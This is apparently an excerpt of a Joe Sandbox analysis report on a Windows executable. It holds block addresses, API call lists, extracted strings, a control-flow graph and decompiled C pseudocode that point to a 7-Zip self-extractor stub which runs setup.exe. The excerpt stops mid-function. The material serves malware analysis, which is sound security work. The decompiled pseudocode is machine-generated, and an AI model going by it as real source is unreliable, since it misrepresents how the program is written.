                              0x00401155
                              0x0040115e
                              0x00401161
                              0x00401164
                              0x00401167
                              0x00401172
                              0x00401173
                              0x0040117d
                              0x00401184
                              0x004011aa
                              0x004011b3
                              0x004011b6
                              0x004011b9
                              0x004011bc
                              0x004011c1
                              0x004011c4
                              0x004011cb
                              0x004014b1
                              0x004014b7
                              0x004014bd
                              0x004014ce
                              0x004014d3
                              0x004014d5
                              0x004014f0
                              0x004014f7
                              0x004014fa
                              0x004014fc
                              0x00401513
                              0x00401513
                              0x004014fe
                              0x004014fe
                              0x00401501
                              0x00401504
                              0x00401509
                              0x0040150f
                              0x0040150f
                              0x00401515
                              0x00401517
                              0x0040151c
                              0x0040151c
                              0x00401521
                              0x00401526
                              0x00401528
                              0x00401547
                              0x00401551
                              0x00401554
                              0x00401557
                              0x0040155a
                              0x0040155d
                              0x00401568
                              0x0040156c
                              0x00401573
                              0x0040157b
                              0x0040157c
                              0x00401581
                              0x00401583
                              0x004015fc
                              0x00401605
                              0x0040160d
                              0x0040161e
                              0x00401620
                              0x00401622
                              0x00401651
                              0x00401654
                              0x0040172c
                              0x0040172f
                              0x00401787
                              0x00401791
                              0x00401799
                              0x004017a6
                              0x004017b6
                              0x004017be
                              0x004017c6
                              0x004017d5
                              0x004017e8
                              0x004017f0
                              0x004017f5
                              0x004017f9
                              0x00401800
                              0x0040180c
                              0x0040180c
                              0x0040181a
                              0x00401821
                              0x0040182b
                              0x00401831
                              0x00401837
                              0x0040183d
                              0x00401843
                              0x0040184a
                              0x00401850
                              0x0040185d
                              0x00401868
                              0x00401889
                              0x0040188f
                              0x00401891
                              0x00401940
                              0x00401952
                              0x00401955
                              0x0040195a
                              0x0040195a
                              0x0040195e
                              0x00401965
                              0x0040196e
                              0x0040196e
                              0x00401977
                              0x0040197c
                              0x00401987
                              0x0040198d
                              0x00401990
                              0x00401995
                              0x00401995
                              0x00000000
                              0x00401897
                              0x00401897
                              0x0040189a
                              0x0040189c
                              0x0040189e
                              0x0040189e
                              0x004018a9
                              0x004018ae
                              0x004018af
                              0x004018b2
                              0x004018b4
                              0x004018b7
                              0x004018b7
                              0x004018c2
                              0x004018c8
                              0x004018cb
                              0x004018d0
                              0x004018d0
                              0x004018d9
                              0x004018e4
                              0x004018ec
                              0x004018f7
                              0x004018ff
                              0x00401907
                              0x0040190f
                              0x00401917
                              0x0040191f
                              0x0040192a
                              0x00401934
                              0x00000000
                              0x00401934
                              0x00401891
                              0x00401739
                              0x0040174e
                              0x0040175b
                              0x0040175f
                              0x00401762
                              0x00401767
                              0x0040176b
                              0x00000000
                              0x00000000
                              0x0040176d
                              0x00401770
                              0x0040177d
                              0x0040177d
                              0x00000000
                              0x00401770
                              0x00401660
                              0x00401668
                              0x0040166b
                              0x00401675
                              0x0040167f
                              0x00401685
                              0x0040168b
                              0x00401691
                              0x0040169a
                              0x0040169a
                              0x004016a5
                              0x004016ad
                              0x004016b5
                              0x004016b7
                              0x004016c4
                              0x004016ca
                              0x004016d7
                              0x004016dd
                              0x004016e4
                              0x00401716
                              0x00401719
                              0x00401721
                              0x00000000
                              0x004016e6
                              0x004016e6
                              0x004016e9
                              0x004016f0
                              0x004016f2
                              0x004016f2
                              0x004016fa
                              0x00401702
                              0x00000000
                              0x00401707
                              0x004016e4
                              0x00401627
                              0x0040162c
                              0x00401637
                              0x00000000
                              0x0040163d
                              0x00401585
                              0x00401588
                              0x004015f1
                              0x004015f1
                              0x00000000
                              0x004015f1
                              0x0040158a
                              0x0040158d
                              0x00401594
                              0x0040159c
                              0x004015a6
                              0x004015b1
                              0x004015b7
                              0x004015bc
                              0x004015bc
                              0x004015c1
                              0x004015c3
                              0x004015c6
                              0x004015d0
                              0x004015df
                              0x004015eb
                              0x004015f0
                              0x004015c6
                              0x00000000
                              0x004015c1
                              0x0040158f
                              0x00401592
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0040152a
                              0x00401531
                              0x0040163e
                              0x0040163e
                              0x00401640
                              0x00401649
                              0x00401649
                              0x004014e8
                              0x004014e8
                              0x004014ea
                              0x00401998
                              0x0040199e
                              0x004019a9
                              0x004019b1
                              0x004019bc
                              0x004019c1
                              0x00000000
                              0x004019c1
                              0x00401528
                              0x004014d7
                              0x004014da
                              0x004014e1
                              0x004014e3
                              0x004014e3
                              0x00000000
                              0x004014da
                              0x004011d7
                              0x004011ea
                              0x004011f0
                              0x004011f5
                              0x004011f7
                              0x0040121a
                              0x0040122c
                              0x00401234
                              0x0040123c
                              0x00401243
                              0x00401255
                              0x0040125d
                              0x00401265
                              0x0040126c
                              0x00401281
                              0x00401289
                              0x0040129a
                              0x0040129f
                              0x004012a1
                              0x004012a3
                              0x004012a3
                              0x004012b1
                              0x004012c7
                              0x004012c9
                              0x004012ce
                              0x004012d1
                              0x004012e2
                              0x004012e6
                              0x004012e6
                              0x004012eb
                              0x004012ee
                              0x0040139d
                              0x004013a5
                              0x004013c3
                              0x004013ce
                              0x004013d6
                              0x004013e5
                              0x00401403
                              0x0040140e
                              0x00401416
                              0x00401425
                              0x00401433
                              0x00401454
                              0x0040145f
                              0x0040146a
                              0x00401472
                              0x0040147d
                              0x00401485
                              0x0040148d
                              0x00401492
                              0x0040149b
                              0x004014a1
                              0x004014ac
                              0x00000000
                              0x004012f4
                              0x004012f4
                              0x004012f7
                              0x00000000
                              0x00000000
                              0x00401306
                              0x0040130c
                              0x0040130f
                              0x00000000
                              0x00000000
                              0x0040131b
                              0x00401323
                              0x0040132b
                              0x00401330
                              0x00401333
                              0x00401339
                              0x0040133f
                              0x0040134a
                              0x00401352
                              0x0040135d
                              0x00401365
                              0x0040136d
                              0x00401375
                              0x0040137d
                              0x00401385
                              0x00401390
                              0x00000000
                              0x00401395
                              0x004012ee
                              0x004011f9
                              0x004011fc
                              0x00401203
                              0x00401205
                              0x00401205
                              0x0040120a
                              0x0040120c
                              0x00000000
                              0x00401186
                              0x00401189
                              0x00401192
                              0x00401192
                              0x00401197
                              0x00401199
                              0x004019c4
                              0x004019c7
                              0x004019cf
                              0x004019d7
                              0x004019df
                              0x004019e7
                              0x004019f2
                              0x004019fa
                              0x00000000
                              0x004019fa

                              APIs
                                • Part of subcall function 00401A51: GetVersionExA.KERNEL32(?), ref: 00401A6B
                              • GetCommandLineW.KERNEL32(00000003,00000003,00000003,00000003,?,00000000), ref: 0040108B
                                • Part of subcall function 004038EE: __EH_prolog.LIBCMT ref: 004038F3
                                • Part of subcall function 004045E2: __EH_prolog.LIBCMT ref: 004045E7
                                • Part of subcall function 004045E2: GetModuleFileNameW.KERNEL32(?,?,00000105,00000003,00000000,00000000), ref: 00404618
                                • Part of subcall function 0040235E: __EH_prolog.LIBCMT ref: 00402363
                                • Part of subcall function 00402323: __EH_prolog.LIBCMT ref: 00402328
                                • Part of subcall function 00403D5A: __EH_prolog.LIBCMT ref: 00403D5F
                              • MessageBoxW.USER32(00000000,?,?,00000010), ref: 004015DF
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000001,?,?,00000003,00000003,0042023C,;!@InstallEnd@!,?,00000003,00000000,00000002,00420274,00000003,?), ref: 0040161E
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 00401627
                              • ShellExecuteExA.SHELL32(0000003C,?,00000000), ref: 004016D7
                              • MessageBoxW.USER32(00000000,?,?,00000024), ref: 00401306
                                • Part of subcall function 00411093: MessageBoxW.USER32(00000000,?,7-Zip,00000010), ref: 0041109C
                                • Part of subcall function 00402F15: __EH_prolog.LIBCMT ref: 00402F1A
                              • SetCurrentDirectoryA.KERNEL32(?,?,00000000), ref: 004018B2
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 00401940
                              • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00401965
                              • CloseHandle.KERNEL32(?,?,00000000), ref: 0040196E
                              • SetCurrentDirectoryA.KERNELBASE(?,?,00000000), ref: 00401977
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.490014398.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000001.00000002.490004382.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490039996.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490058579.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490070419.0000000000422000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490097173.0000000000423000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000001.00000002.490153822.0000000000427000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_400000_file.jbxd
                              Similarity
                              • API ID: H_prolog$CurrentDirectory$Message$CloseHandle$CommandExecuteFileLineModuleNameObjectShellSingleVersionWait
                              • String ID: $%%T$%%T\$;!@Install@!UTF-8!$;!@InstallEnd@!$<$> @$Can not create temp folder archive$Can not find setup.exe$Can not load codecs$Can not open file$Can't load config info$Config failed$D$Directory$ExecuteFile$ExecuteParameters$RunProgram$Title$setup.exe
                              • API String ID: 2760820266-829806607
                              • Opcode ID: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction ID: 30a6e78c0a87ce65c61bf6c489231b06ab30573cf11c386798d37ebdc1e5dfdc
                              • Opcode Fuzzy Hash: 2ae731fc3f4a3823738156fd9143628e005fdebe6c7a76c6afd666806b1dc003
                              • Instruction Fuzzy Hash: 57524971D002199ADF21EFA1DC85AEEBB75BF04318F1040BFE149761A2DB395A85CF58
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040AD19 Relevance: 14.2, APIs: 9, Instructions: 682COMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 372 40ad19-40ad3d call 413954 call 40d7cc 377 40ad43-40ad79 call 402155 call 413310 call 40640d 372->377 378 40b2d7-40b2dc 372->378 386 40ae60-40ae97 call 40acc4 call 40b99b call 40b63c 377->386 387 40ad7f 377->387 379 40b605-40b613 378->379 402 40aeb6-40aec6 call 4042d6 386->402 403 40ae99-40aeb0 call 40b753 386->403 389 40ad82-40ad8c call 403a76 387->389 395 40ad9c 389->395 396 40ad8e-40ad9a 389->396 398 40ad9e-40ada3 395->398 396->398 400 40ada5-40ada7 398->400 401 40adab-40add6 call 403a76 398->401 400->401 410 40add8-40ade8 401->410 411 40adea 401->411 414 40aed1-40aed5 402->414 415 40aec8-40aece 402->415 403->402 413 40b071-40b087 403->413 412 40adec-40adf1 410->412 411->412 418 40adf3-40adf5 412->418 419 40adf9-40ae32 call 40640d call 40a5e4 412->419 426 40b08d-40b090 413->426 427 40b4bf-40b4e1 call 40a402 413->427 416 40aed7-40aeeb call 403a76 414->416 417 40af18-40af2a 414->417 415->414 431 40aef6 416->431 432 40aeed-40aef4 call 40b860 416->432 429 40af73-40af79 417->429 430 40af2c-40af6e call 4042ad call 4099bc DeleteCriticalSection call 403800 417->430 418->419 449 40ae34-40ae36 419->449 450 40ae3a-40ae40 419->450 435 40b093-40b0c8 426->435 445 40b4e3-40b4e9 427->445 446 40b4ec-40b4ef 427->446 441 40b05f-40b06e call 40b96f 429->441 442 40af7f-40afac call 4063bd 429->442 506 40b535-40b549 call 4042d6 call 4042ad 430->506 439 40aef8-40af0c call 40640d 431->439 432->439 453 40b0f3-40b0f9 435->453 454 40b0ca-40b0d3 435->454 470 40af13 439->470 471 40af0e-40af11 439->471 441->413 472 40afb2-40afbd 442->472 473 40b197-40b1a0 442->473 445->446 456 40b4f1-40b533 call 4042ad call 4099bc DeleteCriticalSection call 403800 446->456 457 40b54e-40b57e call 4032a8 call 404327 446->457 449->450 461 40ae42-40ae44 450->461 462 40ae48-40ae57 450->462 467 40b101-40b149 call 4032a8 * 2 call 404327 * 2 453->467 468 40b0fb-40b0fd 453->468 463 40b382-40b388 454->463 464 40b0d9-40b0ea 454->464 456->506 520 40b580-40b597 call 4039df 457->520 521 40b599-40b5b9 call 409cc8 457->521 461->462 462->389 474 40ae5d 462->474 480 40b390-40b3d7 call 4042ad call 4099bc DeleteCriticalSection call 403800 463->480 481 40b38a-40b38c 463->481 499 40b0f0 464->499 500 40b3d9-40b3e2 464->500 576 40b163-40b169 467->576 577 40b14b-40b161 call 4039df 467->577 468->467 477 40af15 470->477 471->477 482 40afeb-40afef 472->482 483 40afbf-40afc3 472->483 484 40b1a2-40b1a4 473->484 485 40b1a8-40b1b1 473->485 474->386 477->417 562 40b42c-40b442 call 4042d6 call 4042ad 480->562 481->480 487 40b270-40b279 482->487 488 40aff5-40b004 call 40640d 482->488 483->482 493 40afc5-40afca 483->493 484->485 495 40b1b3-40b1b5 485->495 496 40b1b9-40b1fd call 4042ad call 4099bc DeleteCriticalSection call 403800 485->496 504 40b281-40b2d2 call 4042ad call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 487->504 505 40b27b-40b27d 487->505 527 40b011-40b026 call 40bab0 488->527 528 40b006-40b00c call 40a0de 488->528 508 40afd0-40afdc call 40640d 493->508 509 40b202-40b20b 493->509 495->496 496->506 499->453 512 40b3e4-40b3e6 500->512 513 40b3ea-40b425 call 4042ad call 4099bc DeleteCriticalSection call 403800 500->513 504->378 505->504 569 40b603 506->569 508->527 537 40afde-40afe9 call 40a0b9 508->537 515 40b216-40b21c 509->515 516 40b20d-40b213 509->516 512->513 513->562 530 40b224-40b26b call 4042ad call 4099bc DeleteCriticalSection call 403800 515->530 531 40b21e-40b220 515->531 516->515 520->521 549 40b5bc-40b5fe call 4042ad * 2 call 4099bc call 40b845 call 40a5ac 521->549 565 40b028-40b02a 527->565 566 40b02e-40b037 527->566 528->527 530->506 531->530 537->527 549->569 562->379 565->566 574 40b039-40b03b 566->574 575 40b03f-40b048 566->575 569->379 574->575 585 40b050-40b059 575->585 586 40b04a-40b04c 575->586 588 40b33a-40b36e call 4042ad * 2 576->588 589 40b16f 576->589 577->576 585->441 585->442 586->585 588->435 627 40b374-40b379 588->627 595 40b172-40b179 589->595 600 40b2e5 595->600 601 40b17f 595->601 603 40b2e8-40b2ea 600->603 605 40b182-40b184 601->605 607 40b2f8-40b2ff 603->607 608 40b2ec-40b2f6 603->608 610 40b2e1-40b2e3 605->610 611 40b18a-40b190 605->611 614 40b310 607->614 615 40b301 607->615 613 40b31e-40b334 call 4039df 608->613 610->603 611->605 617 40b192 611->617 613->588 613->595 619 40b313-40b315 614->619 618 40b304-40b306 615->618 617->600 622 40b308-40b30e 618->622 623 40b37e-40b380 618->623 624 40b447-40b4ba call 4042ad * 3 call 4099bc DeleteCriticalSection call 403800 call 4042d6 call 4042ad 619->624 625 40b31b 619->625 622->614 622->618 623->619 624->379 625->613 627->427
                              C-Code - Quality: 90%
                              			E0040AD19(char* __ecx, void* __eflags) {
				signed int _t373;
				signed int _t382;
				intOrPtr* _t417;
				signed int _t419;
				signed int _t423;
				signed int _t429;
				signed int _t430;
				intOrPtr* _t440;
				intOrPtr* _t441;
				signed int _t453;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed int _t471;
				signed int _t482;
				signed int _t483;
				signed int _t484;
				signed int _t490;
				signed int _t504;
				signed int _t505;
				intOrPtr _t507;
				signed int _t508;
				signed char _t510;
				char _t512;
				intOrPtr* _t513;
				signed int _t518;
				signed int _t523;
				signed int _t535;
				signed int _t537;
				signed int _t538;
				signed int _t539;
				intOrPtr* _t540;
				signed int _t580;
				signed int _t581;
				intOrPtr _t589;
				signed int _t595;
				signed int _t626;
				signed int _t652;
				signed int _t653;
				char* _t658;
				signed int _t660;
				signed int _t661;
				intOrPtr* _t662;
				signed int _t664;
				signed int* _t667;
				signed int _t668;
				signed int _t669;
				signed int _t670;
				intOrPtr _t671;
				signed int _t672;
				signed int _t673;
				signed int _t674;
				intOrPtr _t675;
				intOrPtr* _t676;
				signed int _t677;
				void* _t678;

				E00413954(E0041A132, _t678);
				_t664 =  *(_t678 + 0x18);
				_t658 = __ecx;
				 *((intOrPtr*)(_t678 - 0x30)) = __ecx;
				if(E0040D7CC(_t664) == 0) {
					L81:
					_t373 = 0x80004001;
					L114:
					 *[fs:0x0] =  *((intOrPtr*)(_t678 - 0xc));
					return _t373;
				}
				E00402155(_t678 - 0x2c);
				 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
				 *(_t678 - 4) = 0;
				 *((intOrPtr*)(_t678 - 0x50)) = 0;
				E00413310(_t678 - 0x4c);
				 *(_t678 - 4) = 1;
				E0040640D(_t678 - 0x50,  *(_t678 + 8));
				 *(_t678 + 8) = 0;
				if( *((intOrPtr*)(_t664 + 0x30)) <= 0) {
					L19:
					_t535 =  *( *(_t678 + 0x18) + 8);
					 *(_t678 - 0x18) = _t535;
					E0040ACC4(_t678 - 0xf8);
					 *(_t678 - 4) = 4;
					E0040B99B(_t678 - 0xa8);
					 *(_t678 - 4) = 5;
					E0040B63C( *(_t678 + 0x18), _t678 - 0xf8);
					if( *_t658 == 0) {
						L21:
						E004042D6();
						_t382 =  *(_t658 + 0x74);
						_t667 = _t658 + 0x74;
						if(_t382 != 0) {
							 *((intOrPtr*)( *_t382 + 8))(_t382);
							 *_t667 =  *_t667 & 0x00000000;
						}
						if( *((char*)(_t658 + 0x68)) != 0) {
							_push(0x88);
							_t504 = E00403A76();
							 *(_t678 + 8) = _t504;
							 *(_t678 - 4) = 6;
							if(_t504 == 0) {
								_t505 = 0;
								__eflags = 0;
							} else {
								_t505 = E0040B860(_t504);
							}
							 *(_t678 - 4) = 5;
							 *((intOrPtr*)(_t658 + 0x6c)) = _t505;
							E0040640D(_t667, _t505);
							_t507 =  *((intOrPtr*)(_t658 + 0x6c));
							if(_t507 == 0) {
								_t508 = 0;
								__eflags = 0;
							} else {
								_t508 = _t507 + 4;
							}
							 *((intOrPtr*)(_t658 + 0x70)) = _t508;
						}
						_t668 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70))))))(_t678 - 0xf8);
						_t700 = _t668;
						if(_t668 == 0) {
							 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
							__eflags = _t535;
							if(__eflags <= 0) {
								L50:
								E0040B96F(_t658 + 4, __eflags, _t678 - 0xf8);
								 *_t658 = 1;
								L51:
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x70)))) + 4))();
								_t669 = 0;
								__eflags =  *(_t678 - 0x18);
								 *((intOrPtr*)(_t678 - 0x34)) = 0;
								 *(_t678 + 0x10) = 0;
								 *(_t678 - 0x14) = 0;
								if( *(_t678 - 0x18) <= 0) {
									L105:
									E0040A402(_t678 - 0xf8,  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0xb0)))), _t678 - 0x58, _t678 - 0xfc);
									__eflags =  *((char*)(_t658 + 0x68));
									if( *((char*)(_t658 + 0x68)) != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t658 + 0x6c)) + 0x70)) =  *((intOrPtr*)(_t678 - 0x58));
									}
									__eflags =  *(_t678 - 0x18) - _t669;
									if( *(_t678 - 0x18) != _t669) {
										E004032A8(_t678 - 0x94, 4);
										 *((intOrPtr*)(_t678 - 0x94)) = 0x41b6b8;
										 *(_t678 - 4) = 0x1d;
										E00404327(_t678 - 0x94,  *(_t678 - 0x24));
										_t670 = 0;
										__eflags =  *(_t678 - 0x24);
										if( *(_t678 - 0x24) <= 0) {
											L112:
											_t660 =  *(_t658 + 0x74);
											 *((intOrPtr*)(_t678 - 0x54)) =  *((intOrPtr*)(_t678 + 0x1c));
											_t668 =  *((intOrPtr*)( *_t660 + 0xc))(_t660,  *((intOrPtr*)(_t678 - 0x88)), 0,  *(_t678 - 0x24), _t678 - 0x54, 0, 1,  *((intOrPtr*)(_t678 + 0x20)));
											 *(_t678 - 4) = 5;
											E004042AD(_t678 - 0x94);
											 *(_t678 - 4) = 0x1e;
											E004042AD(_t678 - 0xa8);
											 *(_t678 - 4) = 1;
											E004099BC(_t678 - 0xf8, __eflags);
											 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
											E0040B845(_t678 - 0x50);
											_t366 = _t678 - 4;
											 *_t366 =  *(_t678 - 4) | 0xffffffff;
											__eflags =  *_t366;
											E0040A5AC(_t678 - 0x2c);
											goto L113;
										} else {
											goto L111;
										}
										do {
											L111:
											E004039DF(_t678 - 0x94,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x20)) + _t670 * 4)))));
											_t670 = _t670 + 1;
											__eflags = _t670 -  *(_t678 - 0x24);
										} while (_t670 <  *(_t678 - 0x24));
										goto L112;
									} else {
										 *(_t678 - 4) = 0x1b;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x1c;
										_t668 = 0;
										__eflags = 0;
										goto L109;
									}
								}
								_t661 =  *(_t678 + 0x18);
								 *(_t678 + 8) = 0;
								do {
									 *(_t678 + 0x18) =  *(_t678 + 0x18) & 0x00000000;
									_t671 =  *((intOrPtr*)( *((intOrPtr*)(_t661 + 0xc)) +  *(_t678 - 0x14) * 4));
									_t417 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 8) +  *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x84))))));
									 *(_t678 - 4) = 0x12;
									 *((intOrPtr*)( *_t417))(_t417, 0x41b298, _t678 + 0x18);
									_t419 =  *(_t678 + 0x18);
									__eflags = _t419;
									if(_t419 == 0) {
										L57:
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										_t537 =  *(_t671 + 0x14);
										 *(_t678 + 8) =  *(_t678 + 8) + 4;
										_t672 =  *(_t671 + 0x18);
										E004032A8(_t678 - 0x6c, 4);
										 *((intOrPtr*)(_t678 - 0x6c)) = 0x41b68c;
										 *(_t678 - 4) = 0x17;
										E004032A8(_t678 - 0x80, 4);
										 *((intOrPtr*)(_t678 - 0x80)) = 0x41b68c;
										 *(_t678 - 4) = 0x18;
										E00404327(_t678 - 0x6c, _t537);
										_t423 = E00404327(_t678 - 0x80, _t672);
										__eflags = _t672;
										if(_t672 <= 0) {
											L61:
											 *(_t678 - 0x10) =  *(_t678 - 0x10) & 0x00000000;
											__eflags = _t537;
											if(_t537 <= 0) {
												goto L94;
											}
											_t675 =  *((intOrPtr*)(_t678 - 0x34));
											do {
												_t580 =  *(_t661 + 0x1c);
												_t652 = 0;
												__eflags = _t580;
												if(_t580 <= 0) {
													L83:
													_t429 = _t423 | 0xffffffff;
													__eflags = _t429;
													L84:
													__eflags = _t429;
													if(_t429 < 0) {
														_t581 =  *(_t661 + 0x30);
														_t653 = 0;
														__eflags = _t581;
														if(_t581 <= 0) {
															L90:
															_t430 = _t429 | 0xffffffff;
															__eflags = _t430;
															L91:
															__eflags = _t430;
															if(_t430 < 0) {
																 *(_t678 - 4) = 0x17;
																E004042AD(_t678 - 0x80);
																 *(_t678 - 4) = 5;
																E004042AD(_t678 - 0x6c);
																 *(_t678 - 4) = 0x19;
																E004042AD(_t678 - 0xa8);
																 *(_t678 - 4) = 1;
																E004099BC(_t678 - 0xf8, __eflags);
																 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
																DeleteCriticalSection(_t678 - 0x4c);
																E00403800(_t678 - 0x50);
																 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
																 *(_t678 - 4) = 0x1a;
																E004042D6();
																 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
																E004042AD(_t678 - 0x2c);
																_t373 = 0x80004005;
																goto L114;
															}
															_t589 =  *((intOrPtr*)(_t678 + 0x14));
															goto L93;
														}
														_t441 =  *((intOrPtr*)(_t661 + 0x34));
														while(1) {
															__eflags =  *_t441 - _t675;
															if( *_t441 == _t675) {
																break;
															}
															_t653 = _t653 + 1;
															_t441 = _t441 + 4;
															__eflags = _t653 - _t581;
															if(_t653 < _t581) {
																continue;
															}
															goto L90;
														}
														_t430 = _t653;
														goto L91;
													}
													_t430 =  *( *((intOrPtr*)(_t661 + 0x20)) + 4 + _t429 * 8);
													_t589 =  *((intOrPtr*)(_t661 + 0x48));
													goto L93;
												}
												_t440 =  *((intOrPtr*)(_t661 + 0x20));
												while(1) {
													__eflags =  *_t440 - _t675;
													if( *_t440 == _t675) {
														break;
													}
													_t652 = _t652 + 1;
													_t440 = _t440 + 8;
													__eflags = _t652 - _t580;
													if(_t652 < _t580) {
														continue;
													}
													goto L83;
												}
												_t429 = _t652;
												goto L84;
												L93:
												_t423 = E004039DF(_t678 - 0x6c, _t589 + _t430 * 8);
												 *(_t678 - 0x10) =  *(_t678 - 0x10) + 1;
												_t675 = _t675 + 1;
												__eflags =  *(_t678 - 0x10) - _t537;
												 *((intOrPtr*)(_t678 - 0x34)) = _t675;
											} while ( *(_t678 - 0x10) < _t537);
											goto L94;
										} else {
											do {
												_t423 = E004039DF(_t678 - 0x80,  *((intOrPtr*)(_t661 + 0x48)) +  *(_t678 + 0x10) * 8);
												 *(_t678 + 0x10) =  *(_t678 + 0x10) + 1;
												_t672 = _t672 - 1;
												__eflags = _t672;
											} while (_t672 != 0);
											goto L61;
										}
									}
									_t595 =  *(_t671 + 0xc);
									__eflags = _t595 - 0xffffffff;
									 *(_t678 - 0x10) = _t595;
									if(_t595 > 0xffffffff) {
										__eflags = _t419;
										 *(_t678 - 4) = 5;
										if(_t419 != 0) {
											 *((intOrPtr*)( *_t419 + 8))(_t419);
										}
										 *(_t678 - 4) = 0x13;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x14;
										_t538 = 0x80004001;
										L103:
										E004042D6();
										 *(_t678 - 4) =  *(_t678 - 4) | 0xffffffff;
										E004042AD(_t678 - 0x2c);
										_t373 = _t538;
										goto L114;
									}
									_t538 =  *((intOrPtr*)( *_t419 + 0xc))(_t419,  *((intOrPtr*)(_t671 + 0x10)),  *(_t678 - 0x10));
									__eflags = _t538;
									if(_t538 != 0) {
										_t453 =  *(_t678 + 0x18);
										 *(_t678 - 4) = 5;
										__eflags = _t453;
										if(_t453 != 0) {
											 *((intOrPtr*)( *_t453 + 8))(_t453);
										}
										 *(_t678 - 4) = 0x15;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										_t287 = _t678 - 4;
										 *_t287 =  *(_t678 - 4) & 0x00000000;
										__eflags =  *_t287;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x16;
										goto L103;
									}
									_t419 =  *(_t678 + 0x18);
									goto L57;
									L94:
									_t673 =  *(_t678 - 0x14);
									 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t678 - 0x30)) + 0x70)))) + 8))(_t673,  *((intOrPtr*)(_t678 - 0x60)),  *((intOrPtr*)(_t678 - 0x74)));
									 *(_t678 - 4) = 0x17;
									E004042AD(_t678 - 0x80);
									 *(_t678 - 4) = 5;
									E004042AD(_t678 - 0x6c);
									_t674 = _t673 + 1;
									__eflags = _t674 -  *(_t678 - 0x18);
									 *(_t678 - 0x14) = _t674;
								} while (_t674 <  *(_t678 - 0x18));
								_t658 =  *((intOrPtr*)(_t678 - 0x30));
								_t669 = 0;
								goto L105;
							} else {
								goto L34;
							}
							while(1) {
								L34:
								_t676 =  *((intOrPtr*)( *((intOrPtr*)( *(_t678 + 0x18) + 0xc)) +  *(_t678 - 0x10) * 4));
								 *(_t678 + 0x10) = 0;
								 *(_t678 + 8) = 0;
								_push(0);
								_push( *((intOrPtr*)(_t676 + 4)));
								 *(_t678 - 4) = 0xa;
								_push( *_t676);
								_t462 = E004063BD(_t678 + 0x10, _t678 + 8, __eflags);
								_t539 = _t462;
								__eflags = _t539;
								if(_t539 != 0) {
									break;
								}
								 *(_t678 - 0x14) =  *(_t678 - 0x14) & _t462;
								__eflags =  *((intOrPtr*)(_t676 + 0x14)) - 1;
								 *(_t678 - 4) = 0xd;
								if( *((intOrPtr*)(_t676 + 0x14)) != 1) {
									L40:
									__eflags =  *(_t678 + 8);
									if( *(_t678 + 8) == 0) {
										_t471 =  *(_t678 + 0x10);
										 *(_t678 - 4) = 5;
										__eflags = _t471;
										if(_t471 != 0) {
											 *((intOrPtr*)( *_t471 + 8))(_t471);
										}
										 *(_t678 - 4) = 0x10;
										E004042AD(_t678 - 0xa8);
										 *(_t678 - 4) = 1;
										E004099BC(_t678 - 0xf8, __eflags);
										 *(_t678 - 4) =  *(_t678 - 4) & 0x00000000;
										DeleteCriticalSection(_t678 - 0x4c);
										E00403800(_t678 - 0x50);
										 *((intOrPtr*)(_t678 - 0x2c)) = 0x41b6c8;
										 *(_t678 - 4) = 0x11;
										E004042D6();
										_t237 = _t678 - 4;
										 *_t237 =  *(_t678 - 4) | 0xffffffff;
										__eflags =  *_t237;
										E004042AD(_t678 - 0x2c);
										goto L81;
									}
